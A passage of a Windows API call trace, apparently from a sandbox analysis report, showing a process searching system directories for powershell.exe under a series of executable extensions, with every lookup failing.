	[0122.851] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.COM", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.853] SetErrorMode (uMode=0x1) returned 0x1
	[0122.854] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.854] SetErrorMode (uMode=0x1) returned 0x1
	[0122.854] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.EXE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.855] SetErrorMode (uMode=0x1) returned 0x1
	[0122.855] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.856] SetErrorMode (uMode=0x1) returned 0x1
	[0122.856] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.BAT", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.856] SetErrorMode (uMode=0x1) returned 0x1
	[0122.857] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.857] SetErrorMode (uMode=0x1) returned 0x1
	[0122.857] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.CMD", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.858] SetErrorMode (uMode=0x1) returned 0x1
	[0122.858] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.858] SetErrorMode (uMode=0x1) returned 0x1
	[0122.858] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBS", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.859] SetErrorMode (uMode=0x1) returned 0x1
	[0122.859] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.859] SetErrorMode (uMode=0x1) returned 0x1
	[0122.860] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.860] SetErrorMode (uMode=0x1) returned 0x1
	[0122.861] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.861] SetErrorMode (uMode=0x1) returned 0x1
	[0122.861] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JS", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.862] SetErrorMode (uMode=0x1) returned 0x1
	[0122.862] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.862] SetErrorMode (uMode=0x1) returned 0x1
	[0122.862] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JSE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.863] SetErrorMode (uMode=0x1) returned 0x1
	[0122.863] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.863] SetErrorMode (uMode=0x1) returned 0x1
	[0122.864] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSF", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.864] SetErrorMode (uMode=0x1) returned 0x1
	[0122.865] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.865] SetErrorMode (uMode=0x1) returned 0x1
	[0122.865] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSH", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.866] SetErrorMode (uMode=0x1) returned 0x1
	[0122.866] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.866] SetErrorMode (uMode=0x1) returned 0x1
	[0122.952] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.MSC", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.953] SetErrorMode (uMode=0x1) returned 0x1
	[0122.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.955] SetErrorMode (uMode=0x1) returned 0x1
	[0122.956] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.956] SetErrorMode (uMode=0x1) returned 0x1
	[0122.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.956] SetErrorMode (uMode=0x1) returned 0x1
	[0122.956] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.ps1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.957] SetErrorMode (uMode=0x1) returned 0x1
	[0122.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.957] SetErrorMode (uMode=0x1) returned 0x1
	[0122.957] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psm1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.957] SetErrorMode (uMode=0x1) returned 0x1
	[0122.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.957] SetErrorMode (uMode=0x1) returned 0x1
	[0122.957] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psd1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.958] SetErrorMode (uMode=0x1) returned 0x1
	[0122.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.958] SetErrorMode (uMode=0x1) returned 0x1
	[0122.958] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.COM", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.958] SetErrorMode (uMode=0x1) returned 0x1
	[0122.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.959] SetErrorMode (uMode=0x1) returned 0x1
	[0122.959] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.EXE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.959] SetErrorMode (uMode=0x1) returned 0x1
	[0122.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.959] SetErrorMode (uMode=0x1) returned 0x1
	[0122.959] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.BAT", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.959] SetErrorMode (uMode=0x1) returned 0x1
	[0122.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.960] SetErrorMode (uMode=0x1) returned 0x1
	[0122.960] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.CMD", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.960] SetErrorMode (uMode=0x1) returned 0x1
	[0122.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.960] SetErrorMode (uMode=0x1) returned 0x1
	[0122.960] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBS", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.961] SetErrorMode (uMode=0x1) returned 0x1
	[0122.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.961] SetErrorMode (uMode=0x1) returned 0x1
	[0122.961] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.961] SetErrorMode (uMode=0x1) returned 0x1
	[0122.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.961] SetErrorMode (uMode=0x1) returned 0x1
	[0122.961] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JS", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.962] SetErrorMode (uMode=0x1) returned 0x1
	[0122.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.962] SetErrorMode (uMode=0x1) returned 0x1
	[0122.962] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JSE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.962] SetErrorMode (uMode=0x1) returned 0x1
	[0122.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.962] SetErrorMode (uMode=0x1) returned 0x1
	[0122.963] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSF", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.963] SetErrorMode (uMode=0x1) returned 0x1
	[0122.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.963] SetErrorMode (uMode=0x1) returned 0x1
	[0122.963] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSH", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.963] SetErrorMode (uMode=0x1) returned 0x1
	[0122.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.964] SetErrorMode (uMode=0x1) returned 0x1
	[0122.964] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.MSC", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.964] SetErrorMode (uMode=0x1) returned 0x1
	[0122.964] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.964] SetErrorMode (uMode=0x1) returned 0x1
	[0122.964] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.964] SetErrorMode (uMode=0x1) returned 0x1
	[0122.965] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.965] SetErrorMode (uMode=0x1) returned 0x1
	[0122.965] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.ps1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.965] SetErrorMode (uMode=0x1) returned 0x1
	[0122.965] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.965] SetErrorMode (uMode=0x1) returned 0x1
	[0122.965] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psm1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.966] SetErrorMode (uMode=0x1) returned 0x1
	[0122.966] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.966] SetErrorMode (uMode=0x1) returned 0x1
